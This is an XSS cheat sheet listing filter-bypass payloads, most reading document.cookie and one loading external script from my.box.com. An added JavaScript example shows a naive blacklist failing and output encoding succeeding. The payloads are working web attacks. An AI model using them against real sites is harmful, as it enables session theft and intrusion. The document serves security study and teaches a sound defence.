Basic:
"><script >alert(document.cookie)</script>

Bypassing a <script> tag filter:
%253cscript%253ealert(document.cookie)%253c/script%253e   (double URL-encoded; only lands when the server decodes the parameter twice, once before the filter and once after)
"><s]%2b]cript>alert(document.cookie)</script>
"><ScRiPt>alert(document.cookie)</script>   (case variation; defeats a case-sensitive match)
"><<script>alert(document.cookie);//<</script>
foo%00<script>alert(document.cookie)</script>   (null byte)
<scr<script>ipt>alert(document.cookie)</scr</script>ipt>   (nested tag; survives a filter that strips <script> in a single pass)
%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E

Inside an existing <script> block:
'; alert(document.cookie); var foo='
foo\'; alert(document.cookie);//'
</script><script >alert(document.cookie)</script>

XSS without a <script> tag:
<img src=asdf onerror=alert(document.cookie)>
<BODY ONLOAD=alert('XSS')>

On IE, a style attribute can carry a CSS expression() (IE-only; current browsers do not support expression()):
http://www.2cto.com?image=s%22%20style=x:expression(alert(document.cookie))
http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS'))
http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29

In Firefox, if you can control a meta refresh tag, you can inject a javascript: URL (old Firefox only; current browsers refuse javascript: URLs in a meta refresh):
http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
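The bypass list above is aimed at a particular kind of defence: a blacklist that deletes the literal string <script>. The following is an added example, not code from the original notes: a naive filter of that kind, a model of a server that URL-decodes the parameter twice (the ordering the %25-encoded payload depends on), and the output-encoding fix. The payload strings are copied from the lists above; the function names (naiveStripScript, renderWithBlacklist, renderWithEncoding, looksExecutable, bypasses) and the double-decode pipeline are my own assumptions for illustration.

```javascript
// Payloads from the notes above, keyed by the bypass technique each relies on.
const PAYLOADS = {
  nestedTag:     '<scr<script>ipt>alert(document.cookie)</scr</script>ipt>',
  mixedCase:     '"><ScRiPt>alert(document.cookie)</script>',
  doubleEncoded: '%253cscript%253ealert(document.cookie)%253c/script%253e',
  noScriptTag:   '<img src=asdf onerror=alert(document.cookie)>',
};

// Naive blacklist: one case-sensitive pass that deletes literal <script> and
// </script>. This is the kind of filter the bypass list targets; do not use it.
function naiveStripScript(input) {
  return input.replace(/<\/?script>/g, '');
}

// Vulnerable pipeline (assumed for the example): the web server decodes the
// parameter once, the filter runs, then application code decodes it again and
// writes the result into the page unchanged.
function renderWithBlacklist(rawParam) {
  const afterServer = decodeURIComponent(rawParam);
  const filtered = naiveStripScript(afterServer);
  return decodeURIComponent(filtered);
}

// HTML text-context encoding: every character that can open a tag or an
// attribute is replaced by its entity, so nothing the attacker sends can
// start markup.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pipeline: the same double decode is left in place (the bug may
// still exist), but encoding is the last step before the value reaches HTML.
function renderWithEncoding(rawParam) {
  const afterServer = decodeURIComponent(rawParam);
  const afterApp = decodeURIComponent(afterServer);
  return escapeHtml(afterApp);
}

// Rough check of whether the rendered HTML carries something a browser would
// execute: a <script tag in any case, or an on* event-handler attribute inside
// a tag. A literal '<' is needed for either, which is why encoding defeats both.
function looksExecutable(html) {
  return /<script\b/i.test(html) || /<\w+[^>]*\bon\w+\s*=/i.test(html);
}

// Run every payload through a render pipeline; true means the payload bypassed it.
function bypasses(render) {
  const result = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    result[name] = looksExecutable(render(payload));
  }
  return result;
}

// Usage: compare the two strategies side by side.
console.log('naive blacklist:', bypasses(renderWithBlacklist));
console.log('output encoding:', bypasses(renderWithEncoding));
```

Every payload gets through the blacklist, each for a different reason (single pass, case sensitivity, late decoding, no <script> tag at all), while contextual output encoding stops all four without trying to recognise any of them. Note that the encoding has to run after the last decode; encoding a value that is decoded again later would reintroduce the double-encoding hole.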
XSS notes site: http://ha.ckers.org/xss.html
Author: L.N.博客